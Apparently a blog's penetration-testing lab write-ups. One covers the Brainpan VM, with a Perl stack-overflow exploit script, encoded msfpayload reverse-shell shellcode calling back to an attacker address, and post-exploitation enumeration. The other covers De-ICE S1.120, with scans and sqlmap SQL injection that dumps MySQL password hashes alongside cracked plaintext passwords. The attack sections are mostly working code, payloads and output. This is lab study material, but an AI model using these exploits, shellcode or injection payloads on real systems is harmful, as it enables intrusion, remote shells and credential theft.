It doesn't work because of the 0x00 byte: the stack address 0x0042f810 contains a null byte, which terminates the (presumably strcpy-based) copy, so nothing after it would reach the stack. The return address must instead point at a JMP ESP whose address contains no null byte.

root@kali:~# wine OLLYDBG.EXE ../brainpan.exe

OllyDbg: search for JMP ESP -> 0x311712f3. This address lies inside brainpan.exe's own image (the same 0x3117xxxx range appears in EDI in the register dumps), so it contains no null byte and, unlike an OS-DLL address, does not depend on the host's Windows/Wine build.

root@kali:~# hexeditor overflow.txt

[get_reply] copied 550 bytes to buffer
wine: Unhandled page fault on read access to 0xffffffff at address 0x42f88d (thread 002d), starting debugger...
Unhandled exception: page fault on read access to 0xffffffff in 32-bit code (0x0042f88d).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f88d ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  90909090 71909090 75747372 79787776
0x0042f820:  7d7c7b7a 00000a7e 00000000 00000000
0x0042f830:  00000000 00000000 00000000 00000010
0x0042f840:  00000000 00000000 00000000 00000000
0x0042f850:  5da40002 0100007f 00000000 00000000
0x0042f860:  0f270002 00000000 00000000 00000000

root@kali:~# pico buf_ov.pl

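#!/usr/bin/perl
# Brainpan 9999/tcp crash PoC: 524 bytes of filler reach the saved EIP,
# which is overwritten with the address of a JMP ESP inside brainpan.exe
# (0x311712F3, found with OllyDbg); the 'C' padding then sits at ESP, as the
# register dump below confirms (EBP=41414141, stack full of 43434343).
use strict;
use warnings;
use IO::Socket;

# Both arguments are mandatory; the original only checked the port.
if (@ARGV < 2 || $ARGV[0] eq '' || $ARGV[1] eq '') {
    die("Usage: $0 IP_ADDRESS PORT\n\n");
}
my ($host, $port) = @ARGV;

my $baddata = "A" x 524;                        # filler up to the saved return address
$baddata   .= pack('V', 0x311712F3);            # little-endian JMP ESP
$baddata   .= "C" x (3000 - length($baddata));  # pad to 3000 bytes; ESP points here

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
) or die "Cannot connect to $host:$port";

my $banner;
$socket->recv($banner, 1024);   # consume the ASCII banner / password prompt
print $banner;
$socket->send($baddata) or die "send failed: $!";
$socket->close();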

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on write access to 0x00000073 at address 0x42f9eb (thread 0009), starting debugger...
Unhandled exception: page fault on write access to 0x00000073 in 32-bit code (0x0042f9eb).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f9eb ESP:0042f810 EBP:41414141 EFLAGS:00010202(  R- --  I   - - - )
 EAX:ffffffff EBX:7b8a61cc ECX:00000073 EDX:00429501
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  43434343 43434343 43434343 43434343
0x0042f820:  43434343 43434343 43434343 43434343
0x0042f830:  43434343 43434343 43434343 43434343
0x0042f840:  43434343 43434343 43434343 43434343
0x0042f850:  43434343 43434343 43434343 43434343
0x0042f860:  43434343 43434343 43434343 43434343

root@kali:~# msfpayload  windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 C | msfencode -a x86 -b '\x00\x0a\x0d' -t perl

...

root@kali:~# pico buf_ov.pl

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
err:seh:setup_exception_record stack overflow 1648 bytes in thread 0009 eip 7bc411a8 esp 00230cc0 stack 0x230000-0x231000-0x430000

root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
[*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)

my $buf =
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

root@kali:~# pico buf_ov2.pl

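#!/usr/bin/perl
# Brainpan 9999/tcp exploit: 524 bytes of filler reach the saved EIP, which is
# replaced by a JMP ESP inside brainpan.exe (0x311712F3); ESP then points at
# the NOP sled followed by the shellcode. The shellcode is linux/x86 on
# purpose: the "Windows" service runs under Wine on a Linux host (the
# windows/* payload only produced a Wine stack-overflow error), so the shell
# comes back from the Linux side.
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 2 || $ARGV[0] eq '' || $ARGV[1] eq '') {
    die("Usage: $0 IP_ADDRESS PORT\n\n");
}
my ($host, $port) = @ARGV;

# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234,
# shikata_ga_nai-encoded to avoid \x00 \x0a \x0d (95 bytes). The attacker
# address/port are baked in: regenerate if either changes.
my $shellcode =
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

my $nop_sled = "\x90" x 16;             # x86 NOPs; JMP ESP lands here
my $baddata  = "A" x 524;               # filler up to the saved return address (was mis-commented as 520)
$baddata    .= pack('V', 0x311712F3);   # little-endian JMP ESP
$baddata    .= $nop_sled . $shellcode;

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
) or die "Cannot connect to $host:$port";

my $banner;
$socket->recv($banner, 1024);   # banner and password prompt
print $banner;
$socket->send($baddata) or die "send failed: $!";
$socket->close();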

root@kali:~# nc -l -p 1234

root@kali:~# perl buf_ov2.pl 192.168.56.104 9999

...

id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
pwd
/home/puck
ls
checksrv.sh
web
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash

netstat -nlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      995/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      914/python     
udp        0      0 0.0.0.0:19733           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -              
udp6       0      0 :::2659                 :::*                                -              
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     SEQPACKET  LISTENING     6957     -                   /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     6769     -                   @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     7573     -                   /var/run/samba/winbindd_privileged/pipe
unix  2      [ ACC ]     STREAM     LISTENING     7572     -                   /tmp/.winbindd/pipe
unix  2      [ ACC ]     STREAM     LISTENING     9488     999/wineserver      socket
unix  2      [ ACC ]     STREAM     LISTENING     7418     -                   /var/run/dbus/system_bus_socket

cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:

cat checksrv.sh
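#!/bin/bash
# Watchdog for the two services on this box: restarts brainpan.exe
# (tcp/9999, under wine) and SimpleHTTPServer (tcp/10000) when nothing
# is listening on their ports. The scheduler that runs it is not shown
# here; it is expected to be invoked periodically.

# --- run brainpan.exe if it stops ---
# lsof -i exits non-zero when no process holds the port; test the
# command directly rather than inspecting $? on the next line.
if ! lsof -i:9999 >/dev/null; then
  # pgrep yields PIDs only. The previous `ps aux | grep` captured whole
  # ps lines, so kill was handed user/CPU/TTY columns as arguments.
  # Like the old grep, -f matches the string anywhere in a command
  # line, so any process mentioning brainpan.exe is signalled.
  mapfile -t pids < <(pgrep -f -- 'brainpan\.exe')
  if (( ${#pids[@]} > 0 )); then
    kill -9 "${pids[@]}"
    killall wineserver
    killall winedevice.exe
  fi
  /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# --- run SimpleHTTPServer if it stops ---
if ! lsof -i:10000 >/dev/null; then
  mapfile -t pids < <(pgrep -f -- 'SimpleHTTPServer')
  if (( ${#pids[@]} > 0 )); then
    kill -9 "${pids[@]}"
  fi
  # SimpleHTTPServer serves the current directory. If the cd fails the
  # old script went on and served whatever directory it was started in;
  # refuse to start the server instead.
  cd /home/puck/web || exit 1
  # Runs in the foreground, as before: the script does not return while
  # the server is up.
  /usr/bin/python -m SimpleHTTPServer 10000
fi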
fi

find / -type f -perm -04000 -ls
525499   64 -rwsr-xr-x   1 root     root        63632 Sep  6  2012 /bin/umount
525495   32 -rwsr-xr-x   1 root     root        31124 Sep  6  2012 /bin/su
525498   88 -rwsr-xr-x   1 root     root        88768 Sep  6  2012 /bin/mount
530420   32 -rwsr-xr-x   1 root     root        30112 Jun 11  2012 /bin/fusermount
525651   40 -rwsr-xr-x   1 root     root        39124 Oct  2  2012 /bin/ping6
525650   36 -rwsr-xr-x   1 root     root        34780 Oct  2  2012 /bin/ping
...
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudo
672442   60 -rwsr-xr-x   1 root     root        60344 Jun 18  2012 /usr/bin/mtr
658477   32 -rwsr-xr-x   1 root     root        30936 Sep  6  2012 /usr/bin/newgrp
658673   32 -rwsr-xr-x   1 root     root        31756 Sep  6  2012 /usr/bin/chsh
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudoedit
658676   40 -rwsr-xr-x   1 root     root        40300 Sep  6  2012 /usr/bin/chfn
672094   16 -rwsr-xr-x   1 root     root        14020 Oct  2  2012 /usr/bin/traceroute6.iputils
671718   48 -rwsr-sr-x   1 daemon   daemon      46576 Jun 11  2012 /usr/bin/at
675550   16 -rwsr-xr-x   1 root     lpadmin     13672 Dec  4  2012 /usr/bin/lppasswd
658671   44 -rwsr-xr-x   1 root     root        41292 Sep  6  2012 /usr/bin/passwd
658667   60 -rwsr-xr-x   1 root     root        57964 Sep  6  2012 /usr/bin/gpasswd
672668   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Sep  6  2012 /usr/sbin/uuidd
672521  296 -rwsr-xr--   1 root     dip        301944 Sep 26  2012 /usr/sbin/pppd
656771   12 -rwsr-xr-x   1 anansi   anansi       8761 Mar  4  2013 /usr/local/bin/validate
925433  312 -rwsr-xr--   1 root     messagebus   317564 Oct  3  2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
925584  244 -rwsr-xr-x   1 root     root       248064 Sep  6  2012 /usr/lib/openssh/ssh-keysign
788361    8 -rwsr-xr-x   1 root     root         5452 Jun 25  2012 /usr/lib/eject/dmcrypt-get-device
657855   12 -rwsr-xr-x   1 root     root         9740 Oct  3  2012 /usr/lib/pt_chown

find / -perm -2 -ls
...

/usr/local/bin/validate
usage /usr/local/bin/validate <input>
/usr/local/bin/validate aaaa
validating input...passed.
/usr/local/bin/validate
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

root@kali:~# nc -l -p 12345 > validate

nc 192.168.56.101 12345 < /usr/local/bin/validate

root@kali:~# ls -al validate
-rw-r--r-- 1 root root 8761 jan   17 11:47 validate
root@kali:~# ./validate
bash: ./validate: Engedély megtagadva
root@kali:~# chmod 744 validate
root@kali:~# ./validate
usage ./validate <input>

I'm not ready yet to solve this task...

2014. január 13., hétfő

De-ICE-S1.120-A

root@kali:~# netdiscover

 Currently scanning: 192.168.70.0/16   |   Screen View: Unique Hosts                                                     

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                           _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.1.120   08:00:27:df:b1:1d    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.100  08:00:27:15:a3:c4    01    060   CADMUS COMPUTER SYSTEMS                                                

root@kali:~# unicornscan -mT 192.168.1.120
Main [Error   route.c:76] no route to host for `192.168.1.120/32'
Main exiting cant get interface(s) for target(s) from route table
root@kali:~# ifconfig eth0 192.168.1.121 netmask 255.255.255.0
root@kali:~# unicornscan -mT 192.168.1.120
TCP open                 ftp[   21]        from 192.168.1.120  ttl 64
TCP open                 ssh[   22]        from 192.168.1.120  ttl 64
TCP open                http[   80]        from 192.168.1.120  ttl 64
TCP open               https[  443]        from 192.168.1.120  ttl 64
TCP open               mysql[ 3306]        from 192.168.1.120  ttl 64
root@kali:~# nmap -sV -A 192.168.1.120 -pT:21,22,80,443,3306

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-13 11:23 CET
Nmap scan report for 192.168.1.120
Host is up (0.00038s latency).
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x   2 0        0              40 Jan  2  2011 incoming
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
| ssh-hostkey: 1024 d5:92:37:32:f2:29:49:a1:3e:4f:cf:53:49:30:de:97 (DSA)
|_2048 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e (RSA)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T08:10:30+00:00
|_Not valid after:  2010-09-30T08:10:30+00:00
|_ssl-date: 2014-01-13T10:23:39+00:00; -1s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_IDEA_128_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:DF:B1:1D (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.1.120

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

root@kali:~# nc 192.168.1.120 21
220 ProFTPD 1.3.2 Server (Primaline FTP Server) [192.168.1.120]
^C

root@kali:~# ssh root@192.168.1.120
The authenticity of host '192.168.1.120 (192.168.1.120)' can't be established.
RSA key fingerprint is 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.120' (RSA) to the list of known hosts.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied (publickey,password,keyboard-interactive).

root@kali:~# nikto -host 192.168.1.120
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2014-01-13 11:27:44 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2014-01-13 11:27:59 (GMT1) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:~# cd /usr/share/dirb

root@kali:/usr/share/dirb# dirb http://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:28:36 2014
URL_BASE: http://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.1.120/ ----
+ http://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)                                                                     

                                  
+ http://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)                                                                 

                                  
+ http://192.168.1.120/index.php (CODE:200|SIZE:1325)                                                                    

                                  
==> DIRECTORY: http://192.168.1.120/phpmyadmin/                                                                          

                                  
==> DIRECTORY: http://192.168.1.120/webalizer/                                                                           

                                  
root@kali:/usr/share/dirb#
nikto -host 192.168.1.120 -port 443
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
                   Ciphers: DHE-RSA-AES256-SHA
                   Issuer:  /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
+ Start Time:         2014-01-13 11:32:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.1.120' does not match certificate's CN 'localhost'
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2014-01-13 11:34:35 (GMT1) (137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb https://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:35:44 2014
URL_BASE: https://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: https://192.168.1.120/ ----
+ https://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)                                                                    

                                  
+ https://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)                                                                

                                  
+ https://192.168.1.120/index.php (CODE:200|SIZE:1325)                                                                   

                                  
==> DIRECTORY: https://192.168.1.120/phpmyadmin/                                                                         

                                  
==> DIRECTORY: https://192.168.1.120/webalizer/                                                                          

index.php

<p><a href=index.php>Home</a> <a href=add_product.php>Add Product</a> <a href=products.php>View Products</a></p>

add_product.php

<form action="insert_products.php" method="POST">

products.php
<form action="products.php" method="GET">

http://192.168.1.120/insert_products.php

product=prod&description=desc&price=1

--
root@kali:/usr/share/dirb# nc 192.168.1.120 3306
F�j Host '192.168.1.121' is not allowed to connect to this MySQL server

http://192.168.1.120/phpmyadmin/setup/

http://192.168.1.120/phpmyadmin/Documentation.htm

phpMyAdmin 3.1.3.1 Documentation

http://192.168.1.120/products.php?id=1

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1"

...
[12:03:02] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8867=8867

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71676e6871,0x4f5255754b6446647646,0x7176646171),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[12:03:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
[12:03:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 12:03:24

--dbs

[12:04:45] [INFO] fetching database names
available databases [6]:
[*] cdcol
[*] information_schema
[*] merch
[*] mysql
[*] phpmyadmin
[*] test

Database: cdcol
Table: cds
[3 entries]
+----+------+-----------------------------------+------------------+
| id | jahr | titel                             | interpret        |
+----+------+-----------------------------------+------------------+
| 1  | 1990 | Beauty                            | Ryuichi Sakamoto |
| 4  | 2001 | Goodbye Country (Hello Nightclub) | Groove Armada    |
| 5  | 1997 | Glee                              | Bran Van 3000    |
+----+------+-----------------------------------+------------------+

Database: mysql
Table: user
[50 entries]
+------------+------------------------------------------------------+
| User       | Password                                             |
+------------+------------------------------------------------------+
| aadams     | *90837F291B744BBE86DF95A37D2B2524185DBBF5 (whatever) |
| aallen     | *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 (nintendo) |
| aard       | *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 (kotaku)   |
| aharp      | *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 (passw0rd) |
| aheflin    | *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 (654321)   |
| amaynard   | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456)   |
| aspears    | *A5892368AE83685440A1E27D012306B073BDF5B7 (monkey)   |
| aweiland   | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 (123123)   |
| bbanter    | *CFBF459D9D6057BC2A85477A38327B96F06B1597 (iloveyou) |
